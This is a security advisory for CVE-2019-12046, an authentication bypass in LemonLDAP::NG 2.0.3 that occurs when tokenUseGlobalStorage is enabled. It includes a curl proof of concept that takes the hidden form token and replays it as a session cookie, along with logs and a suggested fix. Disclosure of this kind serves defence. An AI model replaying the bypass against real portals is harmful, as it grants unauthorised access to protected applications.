[Security: high, CVE-2019-12046] Setting tokenUseGlobalStorage allows unauthenticated users to access the portal (and applications without rules)
References
Concerned version
Version: %2.0.3
Summary
Any token stored in the "main" session database may be used as a valid session identified to browse the portal and access applications with a bogus (all fields are empty), but nonetheless accepted session.
This is an issue if tokens generated by OneTimeToken.pm are stored in main session database, because these token are directly visible to unauthenticated users
Proof of concept:
First, enable tokenUseGlobalStorage
, in the manager, then
$ curl -s http://auth.example.com/ | grep token
<input type="hidden" name="token" value="5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862" />
$ curl -sb lemonldap=5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862 http://auth.example.com/ | grep Connected
<span trspan="connectedAs">Connected as</span>
$ curl -sb lemonldap=5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862 http://test1.lemonregister.lxd/ | grep title
<title>LemonLDAP::NG sample protected application</title>
We are logged onto the portal with an empty username, but that's enough to browse the application list, and accept applications that have no access rules (or rules that behave badly in the presence of an empty string!)
Logs
LLNG[19019]: Get session 5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862 from Handler::Main::Run
May 10 13:36:08 lemonregister LLNG[19019]: Check session validity from Handler
May 10 13:36:08 lemonregister LLNG[19019]: Session timeout -> 72000
In the global storage, tokens look like this:
{
"_session_kind" : "SSO",
"tokenSessionStartTimestamp" : 1557495341,
"_utime" : 1557423461,
"_type" : "token",
"tokenTimeoutTimestamp" : 1557495461,
"_session_id" : "9333f50d80fdbf77d584af01dba27a2dc72b94f841c44dd30d0b9ed42af589df"
}
That "_session_kind" : "SSO",
is probably the root of the issue, as it doesn't appear when using tokens with the normal configuration (tokenUseGlobalStorage=0)
Possible fixes
The handler and portal should probably check the _kind of the session it retrieves before accepting them.